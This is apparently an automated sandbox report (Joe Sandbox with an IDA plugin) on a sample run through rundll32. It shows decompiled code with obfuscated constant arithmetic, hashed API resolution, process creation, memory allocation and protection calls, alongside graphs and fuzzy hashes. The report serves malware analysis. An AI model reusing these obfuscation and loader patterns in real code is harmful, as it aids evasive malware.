                                                                                                                    				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
                                                                                                                    				 *(_t193 + 0x1c) = 0xb39a57;
                                                                                                                    				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
                                                                                                                    				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
                                                                                                                    				 *(_t193 + 0x54) = 0x8cfebd;
                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
                                                                                                                    				_t169 = 0x1d;
                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
                                                                                                                    				 *(_t193 + 0x24) = 0xadd23a;
                                                                                                                    				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
                                                                                                                    				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
                                                                                                                    				 *(_t193 + 0x20) = 0x1d5481;
                                                                                                                    				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
                                                                                                                    				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
                                                                                                                    				 *(_t193 + 0x2c) = 0x3c40b3;
                                                                                                                    				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
                                                                                                                    				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
                                                                                                                    				 *(_t193 + 0x3c) = 0x52e0cb;
                                                                                                                    				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
                                                                                                                    				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
                                                                                                                    				 *(_t193 + 0x4c) = 0x46a878;
                                                                                                                    				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
                                                                                                                    				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
                                                                                                                    				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
                                                                                                                    				 *(_t193 + 0x30) = 0x13da24;
                                                                                                                    				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
                                                                                                                    				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
                                                                                                                    				 *(_t193 + 0x44) = 0xdb90c5;
                                                                                                                    				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
                                                                                                                    				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
                                                                                                                    				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
                                                                                                                    				 *(_t193 + 0x38) = 0xc3d0db;
                                                                                                                    				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
                                                                                                                    				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
                                                                                                                    				 *(_t193 + 0x58) = 0x1a470a;
                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
                                                                                                                    				 *(_t193 + 0x40) = 0xc6f633;
                                                                                                                    				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
                                                                                                                    				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
                                                                                                                    				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
                                                                                                                    				 *(_t193 + 0x50) = 0xa2e0bb;
                                                                                                                    				_t170 = 0x56;
                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
                                                                                                                    				 *(_t193 + 0x28) = 0x4b9267;
                                                                                                                    				_t171 = 0x28;
                                                                                                                    				_t115 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                    				_t172 = _t115;
                                                                                                                    				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
                                                                                                                    				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
                                                                                                                    				 *(_t193 + 0x48) = 0xd50758;
                                                                                                                    				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
                                                                                                                    				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
                                                                                                                    				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
                                                                                                                    				_push( *(_t193 + 0x1c));
                                                                                                                    				_push( *(_t193 + 0x34));
                                                                                                                    				_t190 = 0x44;
                                                                                                                    				E00334B61(_t115, _t190);
                                                                                                                    				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
                                                                                                                    				_t129 = _t193 - 4; // 0x181c8c00
                                                                                                                    				_t131 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                    				_t163 = E00337F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
                                                                                                                    				if(_t163 == 0) {
                                                                                                                    					_t164 = 0;
                                                                                                                    				} else {
                                                                                                                    					if(_t187 == 0) {
                                                                                                                    						E00341E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
                                                                                                                    						E00341E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
                                                                                                                    					} else {
                                                                                                                    						asm("movsd");
                                                                                                                    						asm("movsd");
                                                                                                                    						asm("movsd");
                                                                                                                    						asm("movsd");
                                                                                                                    					}
                                                                                                                    					_t164 = 1;
                                                                                                                    				}
                                                                                                                    				return _t164;
                                                                                                                    			}














                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID: nJQ
                                                                                                                    • API String ID: 963392458-2884827605
                                                                                                                    • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                    • Instruction ID: 3302123e8a898e84e64c52afc57ff1b50967fa8935125ce120797f02e77ff038
                                                                                                                    • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                    • Instruction Fuzzy Hash: B471F272400288EBCF59CFA4C9898CE3BA5FF48358F118119FE1696224D3B6D9A9DF45
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 501242067-0
                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                    • GlobalHandle.KERNEL32(003C89A8), ref: 100208A9
                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                    • GlobalHandle.KERNEL32(003C89A8), ref: 100208DB
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 496899490-0
                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714421763-0
                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                    APIs
                                                                                                                    • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                    • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                    • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                    • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                    APIs
                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3296620671-0
                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 275 337f5d-337ff1 call 3420b9 call 34aa30 CreateProcessW
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0033AD99,?,?,?,181C8C04,0033AD99), ref: 00337FEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction ID: 0701aadd2b4b147738078cafe20359d42976d3039309f53fe3c3f7d9505ad911
                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction Fuzzy Hash: D3110372402128BBDF629F91DD09CEF7FB9EF093A4F108144FA0925121D2729A60EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 3446bb-34473b call 3420b9 call 34aa30 SHGetFolderPathW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E003446BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				void* _t21;
                                                                                                                    				intOrPtr* _t25;
                                                                                                                    				void* _t26;
                                                                                                                    
                                                                                                                    				E003420B9(_t21);
                                                                                                                    				_v20 = 0x3f5bb0;
                                                                                                                    				_v16 = 0;
                                                                                                                    				_v12 = 0x996874;
                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                    				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                    				_v8 = 0xebf0af;
                                                                                                                    				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                    				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                    				_t25 = E0034AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                    				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                    				return _t26;
                                                                                                                    			}











                                                                                                                    APIs
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00344735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1514166925-0
                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction ID: 0333af44a42b188a917a5526e03c0f38392386751fe5ef18ae2e46143294aa49
                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction Fuzzy Hash: BA012C75801218BBCF15AFD5DC098DFBFB8EF45394F108145F91826212D2759A60DBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 285 3393ed-339461 call 34aa30 ExitProcess
                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E003393ED() {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _v24;
                                                                                                                    				intOrPtr _v28;
                                                                                                                    				intOrPtr _t24;
                                                                                                                    
                                                                                                                    				_v28 = 0xda6c64;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v12 = 0x88a564;
                                                                                                                    				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                    				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                    				_v8 = 0xd9241f;
                                                                                                                    				_v8 = _v8 * 0x5c;
                                                                                                                    				_v8 = _v8 + 0xccdd;
                                                                                                                    				_v8 = _v8 + 0x903;
                                                                                                                    				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                    				E0034AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                    				ExitProcess(0);
                                                                                                                    			}









                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNELBASE(00000000), ref: 0033945B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
